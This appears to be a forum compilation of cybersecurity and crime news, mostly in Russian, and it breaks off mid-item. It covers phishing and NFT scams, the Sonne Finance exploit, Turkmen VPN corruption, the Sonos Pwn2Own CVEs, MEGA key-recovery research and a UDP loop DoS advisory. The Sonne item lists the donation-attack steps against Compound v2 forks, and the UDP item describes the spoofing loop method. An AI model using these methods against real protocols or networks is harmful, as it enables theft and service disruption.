Об этом сообщает maariv.co.il.
Кибер-подразделение в последние месяцы проводило тайное расследование, первоначально исследуя десятки тысяч фишинговых сообщений, направленных на мобильные телефоны невинных гражданских лиц, которые гласили: «Ваша посылка прошла таможенную проверку, вы должны заплатить за ее выдачу».
Сообщение сопровождалось ссылкой, которая привела гражданина на фейковый веб- сайт Почты Израиля, где от него требовали заплатить сотни шекелей, используя данные своей кредитной карты, чтобы иметь возможность получить посылку.
Результаты расследования показали, что гражданин Израиля, проживающий на территориях, распространял сообщения, чтобы обмануть невинных граждан и заставить их платить около 300 шекелей за каждую посылку, когда тот же платеж был конвертирован в цифровые монеты, чтобы скрыть следы преступной деятельности.
Также выяснилось, что подозреваемый присвоил десятки тысяч шекелей с помощью метода мошенничества, когда за период, в котором он действовал, ему удалось заставить десятки граждан ввести данные кредитной карты и оплатить несуществующую посылку.
Следователи смогли отследить действия подозреваемого и с помощью технических средств обнаружить виртуальные кошельки, в которых якобы хранились деньги. Подозреваемый был задержан в деревне.
С января 2014 года по август 2018 года обнальщикам получилось заработать 45.000.000 рублей, зарабатывали же они от коммиссии при совершении сделок (обнала). Отмытая чипинкосами сумма превышает миллиард рублей по информации спецслужб.
«В результате указанной деятельности подсудимые получили доход в размере 44 234 930,99 рублей, который легализовали путем совершения финансовых операций и сделок»
Click to expand...
Пятеро фигурантов получили сроки от четырех лет до 6 лет 9 месяцев. Кроме того, каждого из них оштрафовали. Осужденные должны выплатить суммы в размере от 600 до 900 тысяч рублей. Остальным подсудимым назначили условные сроки от 2 лет 6 месяцев до 3 лет 6 месяцев. Их также оштрафовали на суммы от 200 рублей до 500 тысяч рублей.
«Со всех осужденных конфисковано и обращено в доход государства легализованный доход в размере 44 234 930,99 рубля»
Click to expand...
Децентрализованный лендинговый протокол Sonne Finance подвергся эксплойту, в результате которого ущерб составил около $20 млн.
__https://twitter.com/x/status/1790578458172563648
Согласно заявлению, злоумышленник использовал «известную атаку с пожертвованием» на форки Compound v2, одним из которых является Sonne Finance.
В результате взлома команда протокола приостановила его работу на L2-решении Optimism. Осуществление операций на Base продолжается в обычном режиме.
В 2023 году специалисты Compound [описали уязвимость](https://www.comp.xyz/t/hundred-finance-exploit-and- compound-v2/4266), которая позволяет атаковать рынки с низким предложением и ненулевым коэффициентом обеспечения (CF) на второй версии платформы.
По словам экспертов, чтобы извлечь почти полностью каждый актив на протоколе хакеру нужно последовательно повторить во всех случаях несколько шагов:
создать и профинансировать новый контракт;
на пустом рынке выпустить залоговые токены и большинство выкупить;
пожертвовать эти монеты, чтобы поднять обменный курс;
с помощью этого залога с завышенной стоимостью занять другой актив;
вернуть пожертвования, выкупив обеспечение;
ликвидировать контракт заемщика с помощью взятых в кредит средств и выкупить залоговые токены.
Самым простым решением для действующих проектов на базе Compound v2 специалисты назвали установку нулевого CF для новых рынков.
Команда Sonne Finance заверила, что следовала этой рекомендации. Однако при добавлении поддержки протоколом токена VELO запланировала выполнение условий кредитования (c-factors) через два дня.
По словам разработчиков, злоумышленник дождался анлока и произвел четыре транзакции для создания рынков и еще одну для добавления c-factors.
В Sonne Finance подтвердили, что узнали об атаке из предупреждений участников сообщества.
__https://twitter.com/x/status/1790533115636781557
Благодаря немедленной реакции удалось предотвратить кражу активов еще примерно на $6,5 млн, заявила команда.
Разработчики добавили, что продолжают «расследование личности хакера», но готовы предложить ему награду за возврат выведенных средств.
Сотрудники Управления кибербезопасности Туркменистана заставляют продавцов телефонов в Ашхабаде торговать VPN, построенными на серверах киберуправления. За отказ грозит крупный штраф. Таким образом торговля свободным доступом в интернет превратилась в бизнес, а коррупционеры из кибербезопасности не борются с VPN, а лишь устраняют конкурентов.
Подключение к VPN на столичном оптовом базаре стоит от 400 до 600 манатов (около $20-30). Услуга надежная: серверы Управления кибербезопасности внесены в «белый» список и никогда не отключаются.
Отказаться посредничать продавцы не могут. Многие из них параллельно сами занимаются торговлей VPN, но используют зарубежные серверы, не имеющие отношения к управлению. Это гораздо дешевле: до 100 манатов ($5). Клиенты часто сами просят установить VPN при покупке нового или подержанного телефона. Без этого в Туркменистане невозможно полноценно пользоваться интернетом.
Недостаток «дешевых» VPN в том, что они буквально через пару дней перестают работать. Управление кибербезопасности вносит их сервера в черный список. Зато сам факт этой торговли позволяет сотрудникам ведомства давить на продавцов, угрожать им преследованиями, и в конечном счете — заставлять продавать «правильные» VPN.
Например, недавно сотрудники кибербезопасности целенаправленно заблокировали подсеть 176.123.0.0/16, чтобы разблокировать только свои несколько IP и продавать туда доступ. Одновременно они начали заставлять продавцов телефонов пользоваться только их услугами, иначе им грозит штраф за… распространение VPN!
Одним из зарубежных серверов Управления кибербезопасности является securewarfare.com. Он базируется в Казахстане. Однако turkmen.news знает еще как минимум семь серверов, которые находятся в Туркменистане.
Жадные до денег сотрудники Управления кибербезопасности устраняют конкурентов не только среди торговцев телефонами, но и в иных сферах. Например, «Туркментелеком» предоставляет предпринимателям и организациям виртуальные серверы для своих проектов. Но если сотрудники киберуправления замечают, что кто-то использует эти серверы в качестве VPN, то арендатора могут оштрафовать либо даже посадить на срок от пяти до пятнадцати суток.
Иными словами, сотрудники Управления кибербезопасности не только используют блокировку интернета исключительно для зарабатывания денег, но и злоупотребляют своими полномочиями, чтобы организовывать продажи и устранять конкурентов. Примечательно, что через VPN от Управления кибербезопасности доступны абсолютно все сайты, включая turkmen.news, hronikatm.com, azathabar.com и другие, ради блокировок которых и было создано это управление, а также потрачены десятки миллионов долларов на техническое оснащение.
В последние годы в Туркменистане не блокируют отдельные сайты, которые кажутся властям опасными, а отключают IP целыми подсетями. То есть работать перестает диапазон адресов, начинающихся с определенных цифр. Из-за этого под блокировку попадают сайты, которые даже теоретически не могут считаться вредными. При этом реальной кибербезопасности не существует. В качестве файрволлов Управление использует никому не известный продукт от несуществующей в реальности фирмы Indigo Software.
При каждом большом празднике или ином событии происходит так называемое «усиление», принимаются «меры безопасности» в виде ковровых блокировок интернета, в результате чего за раз безвозвратно блокируют сотни тысяч IP- адресов. Такое происходило, например, когда скончалась мать Гурбангулы Бердымухамедова.
По состоянию на весну 2023 года в Туркменистане уже было заблокировано три четверти существующих в мире IP. Это значит, что пользоваться интернетом без VPN в стране фактически невозможно. И известные VPN (хоть бесплатные, хоть платные) в таких условиях тоже не работают. Тут нужны особые сервисы, построенные под Туркменистан, но срок их работы — до очередной блокировки. Альтернатива — покупать VPN из «белых» списков Управления кибербезопасности.
Ранее источники turkmen.news подсчитали, что доходы составителей «белых» списков IP-адресов исчисляются десятками тысяч долларов ежемесячно. Но кто эти составители и что это за киберуправление?
Данная структура несколько лет назад была выведена из состава Восьмого управления Министерства национальной безопасности, отвечающего за связь и шифрование. Руководителем Управления кибербезопасности был назначен Максат Гельдыев, который до этого возглавлял Восьмое управление. Затем он был уволен и вернулся в Восьмое управление на должность заместителя начальника, но, по данным источников, не потерял влияния на вопросы кибербезопасности.
Управление кибербезопасности после Гельдыева возглавил его родственник Алланазар Кулназаров. Именно эти два человека, а также их подчиненный Дидар Сейидов, руководят блокировками и получают от них доходы. Фактически развитие технологий в стране искусственно тормозится ради того, чтобы эти и другие работники покупали многочисленные дома, квартиры и машины себе и родственникам. Никакого иного смысла в блокировках давно нет.
• Source: [https://turkmen.news/sotrudniki-upr...ev-telefonami-prodavat-vpn- na-svoih-serverah/](https://turkmen.news/sotrudniki-upravleniya- kiberbezopasnosti-turkmenistana-zastavlyayut-torgovcev-telefonami-prodavat- vpn-na-svoih-serverah/)
С учетом позиции прокуратуры Троицкого и Новомосковского административных округов суд заключил под стражу 35-летнего мужчину, обвиняемого в мошенничестве в особо крупном размере.
Обвиняемый обманным путем похитил у москвича цифровую валюту - более 670 тыс. USDT.
Пострадавший мужчина показал, что познакомился с обвиняемым на одной из бизнес-встреч. Затем фигурант сообщил, что занимается привлечением денежных средств в NFT бизнес-проект, указав, что его знакомый - известный художник создает NFT-картины, размещает их на различных ресурсах, после чего их цена возрастает и впоследствии можно получать прибыль.
Пострадавшего заинтересовало это предложение, злоумышленник добавил его в мессенджер-чат, где размещалась информация о сделках.
Злоумышленник сообщил в чате о сделке со сроком возврата 18 дней на крупную сумму, часть из которой ему перевел пострадавший в криптовалюте.
В мае 2023 года мужчина вновь перевел злоумышленнику 1,1 млн рублей, после чего фигурант перестал выходить на связь. Впоследствии потерпевший понял, что никаких коллекций картинок NFT не было и обратился в правоохранительные органы.
При координирующей роли прокуратуры округов устанавливаются все обстоятельства преступной деятельности фигуранта, проверяется его причастность к совершению аналогичных деяний.
OpenAI приостановила публичный доступ к функции распознавания лиц в мультимодальной версии GPT-4 из-за вопросов, касающихся конфиденциальности.
GPT-4, анонсированная ранее в этом году, должна не только обрабатывать и генерировать текст, но и анализировать изображения. OpenAI, в сотрудничестве со стартапом Be My Eyes, также разрабатывала приложение, которое помогает незрячим людям взаимодействовать с окружающим миром, описывая им картинки и фотографии. В последнее время некоторые пользователи стали замечать, что приложение перестало передавать информацию о лицах.
Сандхини Агарвал, исследовательница из OpenAI, подтвердила: модель способна идентифицировать общественных деятелей, у которых есть страница на Википедии. Однако возникают сомнения, что эта функция не нарушит законы о конфиденциальности в ряде регионов, где использование биометрии требует согласия граждан.
Среди других потенциальных проблем — опасения OpenAI, что Be My Eyes может неправильно интерпретировать или искажать характеристики лиц. Например, были случаи, когда GPT-4 неверно распознавала пол и эмоции. Подобные ошибки могут оказаться критичными в некоторых ситуациях. Разработчики собираются учесть вопросы безопасности до того, как функция анализа изображений GPT-4 станет широко доступна. «Мы очень хотим вести двусторонний диалог с общественностью. Если люди говорят, что в чем-то нет необходимости, то мы полностью примем такую позицию» — сообщила Агарвал.
Пока проблемы с приватностью остаются нерешенными, другие компании тестируют похожие технологии. Например, Microsoft разработал инструмент визуального анализа на базе GPT-4 в своем чат-боте Bing. Интересно, что Bing еще недавно проходил тест CAPTCHA (публичный тест Тьюринга), это может замедлить запуск обновления.
Google внедрил функции анализа изображений в нейросеть Bard. Она также способна решать текстовые CAPTCHA, хотя с переменным успехом.
Очевидно, массовое распространение ИИ-технологий компьютерного зрения неизбежно. Однако компаниям еще предстоит решить ряд проблем, прежде чем эти технологии станут доступны широкому кругу пользователей.
На сайте Zero Day Initiative (проект компании Trend Micro) раскрыты детали взлома смарт-колонок Sonos One в ходе декабрьского конкурса Pwn2Own в Торонто. Показанные уязвимости давно устранены, поэтому публикация деталей уже мало кому навредит.
Запись ZDI, посвященная атакам на Sonos One в ходе Pwn2Own, появилась в блоге проекта на прошлой неделе. Там [отмечено](https://www.zerodayinitiative.com/blog/2023/5/24/exploiting-the- sonos-one-speaker-three-different-ways-a-pwn2own-toronto-highlight), что три команды, добившиеся успеха, суммарно получили $105 тыс. из призового фонда.
Эксплойт уязвимостей, выявленных Qrious Secure, STAR Labs и DEVCORE, не требует аутентификации и позволяет добраться до конфиденциальных данных (CVE-2023-27353 и CVE-2023-27354, по 6,5 балла CVSS) либо удаленно выполнить сторонний код на уровне root (CVE-2023-27352 и CVE-2023-27355, по 8,8 балла).
Более подробно:
CVE-2023-27353 вызвана отсутствием адекватной проверки пользовательского ввода в msprox (выполняет функции прокси-сервера), что может привести к чтению за границей выделенного буфера;
CVE-2023-27354 проявляется как целочисленное переполнение при обработке демоном anacapad ответов сервера на обращение к общему каталогу по SMB2;
CVE-2023-27352 возникла из-за отсутствия проверки существования объекта перед выполнением операций над ним и проявляется как use-after-free при обработке команды поиска по каталогу, доступному по SMB;
CVE-2023-27355 привязана к парсеру MPEG-TS, который не проверял величину пользовательского ввода перед копированием, в итоге могло возникнуть переполнение буфера в стеке.
Примечательно, что CVE-2023-27353 и CVE-2023-27354 можно использовать в связке с другими уязвимостями для выполнения произвольного кода с высокими привилегиями.
Патчи для пользователей приложения Sonos S1 включены в состав сборки 11.7.1, для S2 — в 15.1. В более новых релизах этих проблем нет.
Управление по контролю за иностранными активами (OFAC) Министерства финансов США выпустило обновленные рекомендации, в которых освещаются санкционные риски, связанные с платежами с использованием рансомвар в связи с злонамеренными действиями с использованием киберпространства, а также упреждающие шаги, которые компании могут предпринять для снижения таких рисков, включая действия что OFAC сочтет это «смягчающим фактором» в любых связанных с этим принудительных мерах.
https://home.treasury.gov/system/files/126/ofac_ransomware_advisory.pdf

](https://home.treasury.gov/policy-issues/financial-sanctions/recent- actions/20210921)
 home.treasury.gov

](https://xakep.ru/2023/05/23/mobile-vrp/)
Google запустила новую программу вознаграждений за уязвимости, Mobile Vulnerability Rewards Program (Mobile VRP), в рамках которой исследователи смогут получить до 30 000 долларов за баги, обнаруженные в Android- приложениях.
 xakep.ru
Up to 30k reward for, "
Vulnerabilities that can be rewarded include arbitrary code execution, theft
of sensitive data, and various bugs that can be chained with other
vulnerabilities to achieve a similar impact.
Researchers will be able to receive up to $30,000 for remote code execution with no user interaction, and up to $7,500 for bugs that allow sensitive data to be stolen remotely."
Especially the following:
I bet some of yall can collect that 30k now if u wanted haha. This is out of my league.
Мужчина установил вирусную программу на одной из АЗС города, чтобы контролировать отпуск топлива.
Заместитель прокурора Краснодарского края утвердил обвинительное заключение по уголовному делу в отношении жителя Краснодара, распространявшего вирусное программное обеспечение — вредоносную программу он установил на АЗС, [сообщила](https://epp.genproc.gov.ru/web/proc_23/mass- media/news?item=77521115) пресс-служба прокуратуры Краснодарского края.
По версии следствия, в период с 13 июля по 6 ноября 2020 года местный житель, находясь в краевом центре, установил вирусную компьютерную программу для неправомерного воздействия на одну из АЗС, расположенную по улице Л. Чайкиной, принадлежащую крупной нефтеперерабатывающей компании, для возможности контроля отпуска топлива.
В отношении жителя Краснодара завели дело по ч.1 ст.2741УК РФ. Предварительное расследование проводилось сотрудниками УФСБ по краю.
Уголовное дело направили в Советский райсуд Краснодара для рассмотрения по существу, мужчине грозит до 5 лет лишения свободы.
source: epp.genproc.gov.ru/web/proc_23/mass-media/news?item=77521115
Российскую ИТ компанию создали выходцы из журнала «Хакер»
Криптобиржа KuCoin, которая входит в десятку крупнейших в мире, обвиняет своего IT-подрядчика — компанию Convexity — «во взломе серверов и неправомерном использовании конфиденциальной информации», сообщает издание RTVI. При этом Convexity свою вину отрицает и обвиняет во взломе криптобиржы субподрядчиков — компанию Wallarm, известную в сфере IT российскую компанию, которую создали выходцы из журнала «Хакер» Иван Новиков и Степан Ильин. Wallarm обвинения во взломе тоже отвергает.
Судебные разбирательства между KuCoin и ее подрядчиком по обеспечению информационной безопасности — компанией Convexity начались еще 2019 года. Все стороны обвиняли друг друга в нарушении условий заключенного соглашения о предоставлении услуг по информационной безопасности. Однако KuCoin пошла дальше и выдвинула иск, в котором обвинила Convexity в «нарушении конфиденциальности, путем взлома сервера [KuCoin] и неправомерного использования конфиденциальной информации». Convexity эти обвинения в свой адрес отвергла, но обратилась с иском к Wallarm, в котором заявила, что Wallarm и лично ее основатель и гендиректор Иван Новиков ответственны за взлом KuCoin.
«KuCoin утверждает, что Новиков и Wallarm неправомерно, в течение нескольких раз получили доступ к системе KuCoin без авторизации, скачали чувствительную пользовательскую информацию, исходный код, торговые данные, пользовательское ПО, алгоритмы, методы, базу данных пользователей и другую конфиденциальную информацию, принадлежащую KuCoin и/или ее пользователям, и даже пытались получить доступ к средствам клиентов — все это в обход закона, — говорится в иске Convexity. — KuCoin утверждает, что Convexity должна нести ответственность за предполагаемые правонарушения Новикова и Wallarm».
Wallarm в материалах суда обвинения во взломе называет «ложными», «чрезвычайно убийственными обвинениями», которые наносят компании, известной на рынке информационной безопасности, ущерб и негативно влияют на ее бизнес и профессиональную репутацию. Компания также заявляет, что эти обвинения необоснованны и призваны лишь «засорить материалы дела», цель которого лишь «ненадлежащим образом получить деньги».
Как пишет RTVI, в 2018 криптобиржа KuCoin и Convexity планировали создать совместное предприятие. Предполагалось, что KuCoin внесет в СП свою технологическую платформу для торговли криптовалютой, а Convexity будет управлять операционными и юридическими вопросами совместной компании. Перед созданием СП решили провести комплексную оценку бизнеса KuCoin и его инвестиционных рисков. Частью процесса стал пентест.
К проведению пентеста Convexity привлекла лично Ивана Новикова. В августе 2018 года с ним устно заключили контракт, просто обсудив условия работы в мессенджере, а затем предоставили ему копию соглашения о проведении пентеста, заключенную между KuCoin и Convexity, и разъяснили, что работа должна соответствовать его условиям.
После проведения пентеста Convexity решила продолжить сотрудничество с Новиковым и в декабре 2018-го заключила контракт с его компанией Wallarm для предоставления KuCoin услуг по информационной безопасности, предусмотренных сервисным соглашением. Wallarm должна была предоставить KuCoin свой софт Wallarm WAF, обеспечить аудит инфраструктуры, постоянную поддержку и защиту сервисов.
В сентябре 2019 года сервисное соглашение между KuCoin и Convexity, а следовательно, и договор о предоставлении услуг с Wallarm, были расторгнуты. За этим последовали обращения всех компаний в суды. Convexity в октябре 2019-го обратилась в Сингапурский международный арбитражный суд с иском к KuCoin, криптобиржа затем подала встречный иск. В апреле 2020-го Convexity подала иск к Wallarm и лично Ивану Новикову в Верховный суд Калифорнии округа Сан-Франциско, а в марте 2021-го Wallarm ответила встречным иском.
KuCoin в суде утверждала, что разорвала сервисное соглашение с Convexity, так как компания «существенно нарушила свои договорные обязательства». Кроме того, криптобиржа подала отдельный иск, в котором заявила, что Convexity «нарушила конфиденциальность, взломав сервер [KuCoin] и неправомерно воспользовавшись конфиденциальной информацией компании». В KuCoin также отметили, что соглашение с Convexity было «заключено под давлением», но уточнений, в чем заключалось это давление, в открытых материалах дела нет.
Convexity в суде Сингапура требовала от KuCoin выплатить неустойку в размере $2,8 млн за преждевременный разрыв сервисного соглашения и отрицала обвинения во взломе, а в американском суде компания во всех проблемах обвинила своих субподрячиков — Wallarm. «KuCoin полностью потеряла доверие к Wallarm и, как следствие, к самой Convexity», говорится в заявлениях Convexity в суде. Причиной тому, по словам Convexity, стали «чрезвычайно несовершенные» услуги от Wallarm, которые заключались в «медленном реагировании, невнимательности, неправильной настройке программного обеспечения, неспособности обнаружить или предотвратить инциденты в сфере безопасности, с которыми сталкивалась команда KuCoin, а также в высоком уровне отказов программного обеспечения Wallarm».
Кроме этого, Convexity предъявила претензии по поводу проведения пентеста: компания заявила, что его проводил не лично Новиков, а Wallarm — и это не было согласовано и авторизовано ни Convexity, ни KuCoin. «KuCoin утверждает, что вмешательство Wallarm в пентест было нарушением соглашения о пентесте», — говорится в материалах дела.
Судебные споры между KuCoin, Convexity и Wallarm длятся третий год и на данный момент по-прежнему не завершены.
source: rtvi.com/stories/vzlom-odnoj-iz-krupnejshih-v-mire-kriptobirzh
Исследование, опубликованное во вторник, показывает, что утверждение о том, что Mega или организация, контролирующая инфраструктуру Mega, не может получить доступ к данным, хранящимся на сервисе, не соответствует действительности. Авторы утверждают, что архитектура, используемая Mega для шифрования файлов, имеет фундаментальные недостатки в криптографии, которые позволяют любому лицу, контролирующему платформу, провести полную атаку по восстановлению ключей пользователей после того, как они войдут в систему достаточное количество раз. Таким образом, злоумышленник может расшифровать сохраненные файлы или даже загрузить на аккаунт уличающие или другие вредоносные файлы, которые внешне неотличимы от настоящих загруженных данных.
"Мы показываем, что система MEGA не защищает своих пользователей от вредоносного сервера и представляем пять отдельных атак, которые вместе позволяют полностью нарушить конфиденциальность пользовательских файлов", - пишут исследователи на сайте. "Кроме того, целостность пользовательских данных нарушается до такой степени, что злоумышленник может вставить вредоносные файлы по своему выбору, которые пройдут все проверки подлинности клиента. Мы создали доказательные версии всех атак, продемонстрировав их практичность и возможность использования".
Компания Mega опубликовала объявление здесь. Однако председатель совета директоров сервиса заявил, что он не планирует пересматривать обещание компании об отсутствии доступа к данным клиентов.
"В течение очень короткого периода времени у злоумышленника была возможность свести на нет наши обязательства в очень ограниченных обстоятельствах и среди очень небольшого числа пользователей, но теперь эта проблема решена", - написал председатель совета директоров Стивен Холл в электронном письме.
В рекомендации Mega отмечается практическая сложность осуществления атак, включая эксплойт для восстановления ключа, из которого вытекает большинство других атак. Отчасти это связано с тем, что каждый из 512 необходимых входов в систему требует ввода выбранного пользователем пароля. Как и большинство облачных сервисов, Mega обычно использует идентификаторы сеансов, что избавляет пользователя от необходимости проходить аутентификацию при каждом обращении к учетной записи.
Но не исключено, что многие пользователи уже несколько лет назад легко преодолели порог в 512 вводов пароля. Я спросил Холла, председателя совета директоров Mega, считает ли он, что обнаруженные уязвимости отрицают гарантии безопасности Mega, и он ответил отрицательно.
"Выявленные уязвимости сводят на нет гарантии только в том случае, если пользователь входил в систему более 512 раз, пока теоретический злоумышленник был активен", - написал он. "Очевидно, что в MEGA не было запущено ни одного вредоносного процесса, поскольку мы не знали об этой уязвимости, и мы думаем, что очень немногие пользователи вошли бы в систему более 512 раз, находясь под этой потенциальной атакой. Клиенты, вошедшие в систему менее 512 раз, остаются в безопасности".
Исследователи наметили промежуточные и долгосрочные исправления для выявленных ими недостатков, но неясно, будет ли Mega следовать им. На данный момент, по словам исследователей, изменения Mega блокируют конкретную атаку на восстановление ключей, которую они разработали, но они по-прежнему убеждены, что этот недостаток демонстрирует, что заверения Mega преувеличены.
"Представленные здесь атаки показывают, что мотивированная сторона может найти и использовать уязвимости в реальных криптографических архитектурах с разрушительными последствиями для безопасности", - пишут исследователи. "Особенно тревожно, что такие сервисы, как MEGA, которые рекламируют конфиденциальность как основную функцию и, следовательно, особенно привлекают пользователей, нуждающихся в надежной защите, не выдерживают криптоанализа".
Работники Департамента киберполиции совместно с работниками дознания Дарницкого управления полиции Киева и в сотрудничестве с представителями уполномоченного Верховной Рады Украины по правам человека и международными партнерами из США, Молдовы и Германии пресекли факты нарушения защиты персональных данных с использованием автоматизированных систем и сети Интернет.
Профилактические меры были направлены на выявление отдельных лиц и преступных групп, которые занимаются незаконным получением и распространением персональных данных граждан, баз данных, а также установление предприятий, учреждений и организаций, которые могут быть причастны к нарушению законодательства Украины в сфере оборота персональных данных.
В результате совместных действий локализована и прекращена деятельность одного из крупнейших вебресурсов, где незаконно распространялись персональные данные около 200 миллионов человек, в том числе граждан Украины, Молдовы, Беларуси, Казахстана и других стран СНГ.
На сайте содержались сведения относительно номера телефона, фамилии, имя и отчества граждан, их места регистрации, а в отдельных случаях и информацию о предоставленных админуслугах, связанных с использованием транспортных средств.
По данному факту открыто уголовное производство по ст. 182 (Нарушение неприкосновенности частной жизни) Уголовного кодекса Украины. Досудебное расследование продолжается.
Процессуальное руководство осуществляет Дарницкая окружная прокуратура Киева.
Kali Linux выпустила версию 2024.4, ставшую заключительным обновлением года. Новый релиз включает 14 новых инструментов, улучшенную поддержку Raspberry Pi, переход на Python 3.12 по умолчанию и прекращение выпуска образов для архитектуры i386.
14 новых инструментов. Релиз Kali Linux 2024.4 традиционно пополнился новыми инструментами для специалистов в области кибербезопасности. Среди них:
Прекращение поддержки i386. С новой версией Kali Linux прекращено создание образов для архитектуры i386. Решение принято в связи с отказом Debian от поддержки 32-битных сборок в октябре 2024 года. Несмотря на это, пакеты i386 по-прежнему остаются доступными в репозитории и могут запускаться на системах с архитектурой x86-64.
Переход на Python 3.12 и изменения для pip. Python 3.12 стал новым интерпретатором по умолчанию. Установка пакетов с помощью pip напрямую теперь запрещена для предотвращения конфликтов с системным менеджером пакетов apt. Взамен Kali предлагает использовать команду pipx, позволяющую изолировать сторонние пакеты.
Обновления OpenSSH и Raspberry Pi. Версия OpenSSH 9.8p1 в Kali Linux 2024.4 больше не поддерживает DSA-ключи. Для старых систем с этим типом ключей доступен клиент SSH1, замороженный на версии 7.5. Однако инструменты, которые не распознают ssh1, могут потерять совместимость с устаревшими системами.
Улучшена поддержка Raspberry Pi Imager, позволяющего заранее настроить образ Kali для Raspberry Pi. Теперь можно задать имя хоста, параметры входа, ключи SSH, конфигурацию Wi-Fi и локальные настройки перед записью образа на microSD- карту.
Raspberry Pi Imager (Kali.org)
Изменения на рабочем столе. Обновлённое окружение GNOME 47 принесло поддержку изменения акцентного цвета интерфейса. Также добавлены новая панель мониторинга системы и тема входа в систему.
Новый интерфейс входа в Kali Linux 2024.4 (Kali.org)
Окружной прокурор Бруклина Эрик Гонсалес [заявил](http://brooklynda.org/2024/12/06/brooklyn-district-attorney-shuts- down-40-domains-associated-with-nft-crypto-scam-targeting-artists-after- brooklyn-painter-lost-over-135000/), что подразделение по борьбе с киберпреступностью Virtual Currency Unit (VCU) провело операцию против NFT- аферистов. По ее итогу правоохранители заблокировали свыше 40 доменов, которые использовались для мошеннических целей.
Расследование началось после того, как пожилой мужчина потерял $135 000 из-за схемы, нацеленной на художников. Преступники выдали себя за арт-дилеров платформы OpenSea и предложили «клиенту» оцифровать его творчество.
Мошенники убедили пострадавшего, что он сможет хорошо заработать на своей NFT- коллекции. Впоследствии аферисты сказали, будто они успешно распродали токены и мужчина заработал $300 000. При этом для получения средств художнику необходимо заплатить комиссию, заявили авторы схемы.
Пострадавший поверил словам мошенников и снял свои пенсионные накопления, а также взял кредит для оплаты выставленного аферистами счета. В итоге мужчина потерял все свои деньги, так и не дождавшись обещанных $300 000.
Дети 85-летнего художника обратились в полицию, после чего VCU начало расследование. Как результат, они отследили домены преступников и заблокировали их. В то же время выйти на предполагаемых создателей схемы или вернуть украденные средства пока не удалось, отметили правоохранители.
«Криптовалютные мошенничества могут принимать разные формы, но имеют схожие характеристики, такие как нажива на уязвимых жертвах и требование платы за выкуп предполагаемых доходов. Именно такая тактика использовалась в этом деле, что привело наших следователей к сети мошеннических веб-сайтов, которые специально обманывали артистов», — заявил Гонсалес.
Click to expand...
Сотрудники управления по противодействию киберпреступности УВД Брестчины совместно с коллегами из Барановичского ГОВД установили 17-и 22-летнего братьев, которые занимались незаконным оборотом криптовалюты.
В качестве посредников они совершали сделки на специализированных биржах. Таким образом обналичивались и конвертировались в том числе похищенные у белорусских граждан денежные средства.
Нелегальный суммарный оборот подельников составил около 600 тысяч рублей. В момент задержания с поличным при совершении сделок у фигурантов изъята находящаяся в биржевых аккаунтах криптовалюта на сумму свыше 100 тысяч долларов.
На нарушителей составлены административные протоколы за незаконную предпринимательскую деятельность. Санкцией статьи предусмотрен крупный штраф и обращение в доход государства изъятой криптовалюты, а также всей прошедшей через электронные кошельки суммы.
t.me/pressmvd/11763
Координационный центр CERT (компьютерная группа реагирования на чрезвычайные ситуации), опубликовал предупреждение о серии уязвимостей в реализациях различных прикладных протоколов, использующих в качестве транспорта протокол UDP. Уязвимости могут использоваться для организации отказа в обслуживании из-за возможности зацикливания обмена пакетами между двумя хостами. Например, атакующие могут добиться исчерпания доступной пропускной способности сети, блокирования работы сетевых сервисов (например, через создание высокой нагрузки и превышение ограничения интенсивности запросов) и реализации усилителей трафика для DDoS-атак.
Из протоколов, некоторые реализации которых подвержены уязвимости, упоминаются DNS, NTP, TFTP, Echo (RFC862), Chargen (RFC864) и QOTD (RFC865). Наличие уязвимости ([CVE-2024-2169](https://security- tracker.debian.org/tracker/CVE-2024-2169)) подтверждено в отдельных продуктах компаний Cisco, Microsoft, Broadcom, Brother, Honeywell (CVE-2024-1309) и MikroTik. В качестве обходных мер для блокирования уязвимостей рекомендуется включить на межсетевом экране [блокировку спуфинга](https://www.rfc- editor.org/info/bcp38) (uRPF), ограничить доступ к лишним UDP-сервисам и настроить ограничение интенсивности трафика (rate-limit и QoS).
Уязвимости обусловлены незащищённостью протокола UDP от спуфинга адресов - при отсутствии на транзитных маршрутизаторах защиты от спуфинга атакующий может указать в UDP-пакете IP-адрес произвольного сервера и отправить этот пакет на другой сервер, который вернёт ответ на указанный поддельный адрес. Метод атаки сводится к созданию ситуации с зацикливанием обмена пакетами между серверами, использующими уязвимые реализации протокола. Например, в ответ на поступивший пакет целевой сервер может отправить ответ с кодом ошибки, а сервер, адрес которого подставил атакующий, вернёт свой ответ, который, в свою очередь опять приведёт к возврату пакета с кодом ошибки. Таким образом, серверы до бесконечности начнут играть между собой пакетами в "пинг-понг".
Примечательно, что подобный метод атаки не нов и в сервере синхронизации времени ntpd один из вариантов атаки был устранён ещё в 2009 году (CVE-2009-3563) в версиях 4.2.4p8 и 4.2.5. Атака сводилась к отправке NTP-пакета с подставным адресом и выставленным флагом MODE_PRIVATE, при обработке которого целевой сервер возвращал ответ о невозможности использования приватного режима, оставляя в ответе выставленным флаг MODE_PRIVATE. Соответственно другой сервер также не мог обработать данный флаг и возвращал свой ответ, что приводило к зацикливанию обмена пакетами между двумя NTP-серверами. Для протокола DNS предупреждение о возможности совершения подобной атаки [опубликовано ещё в 1996 году](https://vuls.cert.org/confluence/display/historical/CERT+Advisory+CA-1996-01+UDP+Port+Denial- of-Service+Attack).
Глобальное сканирование адресов в интернете показало, что в настоящее время в сети присутствует как минимум 23 тысячи уязвимых TFTP-серверов, 63 тысячи DNS- серверов, 89 тысяч NTP-серверов, 56 тысяч сервисов Echo/RFC862, 22 тысячи сервисов Chargen/RFC864 и 21 тысяча сервисов QOTD/RFC865. Предполагается, что в случае NTP-серверов наличие неисправленной уязвимости связано с использованием очень старых версий ntpd, выпущенных до 2010 года. Сервисы Echo, Chargen и QOTD уязвимы изначально в силу своей архитектуры. Ситуация с серверами TFTP и DNS требует разбирательства с их администраторами. Серверы atftpd и tftpd проблеме не подвержены, так как используют случайный номер исходного сетевого порта при отправке ответа. Из уязвимых DNS-серверов упоминается dproxy-nexgen. В продуктах Microsoft проблема проявляется в [WDS](https://learn.microsoft.com/en- us/windows/win32/wds/about-the-windows-deployment-services-api) (Windows Deployment Services), а в продуктах Cisco проблема присутствует в маршрутизаторах серий 2800 и 2970.
Cybercrime police have arrested a man on Tuesday for his hand in allegedly
sending over 17 million fraudulent text messages as part of an SMS phishing
scam operation.
A Strike Force had been established by the NSW Cybercrime Squad to investigate
the fraudulent use of Subscriber Identity Module (SIM) boxes, an electronic
device used to send bulk text messages across Australian telecommunication
networks.
Detectives executed a search warrant in Moorebank, near Liverpool, where they
arrested a 39-year-old man about 6am on Tuesday.
During the search, police located two active SIM-boxes and bags full of SIM
